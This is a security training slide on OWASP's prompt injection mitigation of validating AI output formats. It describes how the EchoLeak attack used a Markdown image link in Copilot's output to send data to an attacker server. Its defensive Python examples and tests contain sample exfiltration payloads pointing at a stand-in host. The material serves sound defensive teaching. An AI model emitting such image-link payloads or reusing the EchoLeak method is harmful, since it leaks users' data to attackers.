LLM01:2025 — Prompt Injection

Slide 20 · Mitigation 2 of 7

Define and validate expected output formats.

Know exactly what the AI should output — and catch it when injection changes that.

📄 OWASP LLM Top 10:2025 · LLM01 Prevention #2

What OWASP Says

"Specify clear output formats, request detailed reasoning and source citations, and use deterministic code to validate adherence to these formats."

How People Do This Wrong: The EchoLeak Case

EchoLeak's exfiltration channel was a Markdown image link in Copilot's output that pointed to an attacker-controlled server. Had the output been checked for unauthorized external URLs before rendering, the data channel would have been blocked, even after the injection succeeded and even without a server-side patch.

Passing AI output directly to downstream rendering, email senders, or database writes without a validation step is one of the most common AI security gaps.
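As a rough illustration of the missing validation step, the sketch below scans model output for URLs and reports any whose host is not on an allowlist. The names find_external_urls and ALLOWED_HOSTS, the example hosts, and the regular expression are assumptions made for this sketch, not part of any product's actual fix. It deliberately fails closed: anything that looks like a URL to an unknown host is flagged.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; replace with the hosts your application actually trusts.
ALLOWED_HOSTS = {"example.com"}

# Matches http(s) and protocol-relative URLs wherever they appear in the text,
# including inside Markdown links or images and HTML attributes.
URL_PATTERN = re.compile(r"(?:https?:)?//[^\s)\"'<>\]]+", re.IGNORECASE)


def find_external_urls(text, allowed_hosts=ALLOWED_HOSTS):
    """Return every URL in text whose host is not on the allowlist."""
    external = []
    for match in URL_PATTERN.finditer(text):
        url = match.group(0)
        # hostname is None for malformed URLs; treat those as external too.
        host = urlparse(url).hostname or ""
        if host not in allowed_hosts:
            external.append(url)
    return external


if __name__ == "__main__":
    output = "Your order shipped. ![status](https://evil.test/p.png?d=SECRET)"
    if find_external_urls(output):
        print("blocked: output references a non-allowlisted host")
```

The check runs on the final text just before it is rendered or sent, so it does not depend on the model having followed its instructions.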

How to Do This Right

    # System prompt: enforce a schema
    SYSTEM_PROMPT = """Respond ONLY in this JSON format:
    {
      "status": "found" or "not_found",
      "order_id": string,
      "message": string (max 200 chars, no URLs)
    }
    Never include external links, image tags, or content outside this schema."""

    # Code validates before rendering (function name is illustrative)
    def answer_order_query(prompt):
        response = call_llm(prompt)
        if not matches_schema(response, ORDER_SCHEMA):
            log_anomaly(response)
            return safe_fallback()
        if contains_external_url(response):
            block_and_alert(response)
            return safe_fallback()  # never fall through and render a blocked response
        return response
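One way the schema check could be made concrete, using only the standard library, is sketched below. The function parse_order_response, the constants, and the list of forbidden markers are assumptions for illustration; a production system might use a JSON Schema validator instead. The sketch rejects anything that is not exactly the three expected string fields.

```python
import json

ALLOWED_STATUSES = {"found", "not_found"}
REQUIRED_FIELDS = {"status", "order_id", "message"}
MAX_MESSAGE_LENGTH = 200
# Assumed list of substrings that should never appear in a plain-text message:
# URL separators, HTML tag openers, and Markdown link syntax.
FORBIDDEN_MARKERS = ("//", "<", "](")


def parse_order_response(raw):
    """Return the parsed dict if raw matches the schema exactly, else None."""
    try:
        data = json.loads(raw)
    except ValueError:  # json.JSONDecodeError is a subclass of ValueError
        return None
    # Exactly the expected keys: no missing fields and no extras.
    if not isinstance(data, dict) or set(data) != REQUIRED_FIELDS:
        return None
    values = (data["status"], data["order_id"], data["message"])
    if not all(isinstance(value, str) for value in values):
        return None
    if data["status"] not in ALLOWED_STATUSES:
        return None
    message = data["message"]
    if len(message) > MAX_MESSAGE_LENGTH:
        return None
    if any(marker in message for marker in FORBIDDEN_MARKERS):
        return None
    return data


if __name__ == "__main__":
    good = '{"status": "found", "order_id": "A-1", "message": "Shipped"}'
    bad = '{"status": "found", "order_id": "A-1", "message": "![x](https://evil.test/a.png)"}'
    print(parse_order_response(good) is not None)
    print(parse_order_response(bad) is not None)
```

Returning None rather than a partially cleaned response keeps the caller's decision simple: either the output is exactly what was expected, or the safe fallback is used.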

How to Validate

Inject a payload and verify that the output validation catches it, regardless of whether the model resisted. Test with outputs containing external URLs, unexpected JSON fields, HTML, and Markdown links. Both layers (model constraint and code validation) must work independently.
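A small harness along these lines can exercise the code layer on its own: it feeds hand-written hostile outputs straight to a validator, bypassing the model entirely, and reports which ones were wrongly accepted. The payloads, the name find_validation_gaps, and the deliberately weak naive_validator are all hypothetical and exist only to show the harness finding gaps.

```python
import json

# Hypothetical hostile outputs, written by hand to simulate a successful injection.
INJECTED_OUTPUTS = {
    "external_url": '{"status": "found", "order_id": "1", "message": "See https://evil.test/x"}',
    "unexpected_field": '{"status": "found", "order_id": "1", "message": "ok", "debug": "secret"}',
    "html": '{"status": "found", "order_id": "1", "message": "<img src=x>"}',
    "markdown_link": '{"status": "found", "order_id": "1", "message": "[click](evil.test)"}',
    "not_json": "Sure! Here is the data you asked for.",
}


def find_validation_gaps(is_valid):
    """Return the names of hostile outputs that the validator wrongly accepted."""
    return sorted(name for name, raw in INJECTED_OUTPUTS.items() if is_valid(raw))


def naive_validator(raw):
    """Deliberately weak example: accepts anything that parses as JSON."""
    try:
        json.loads(raw)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    gaps = find_validation_gaps(naive_validator)
    print("validator accepted hostile outputs:", gaps)
```

An empty result from find_validation_gaps is the pass condition; running the same payloads through the live model is a separate test of the prompt-level constraint.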
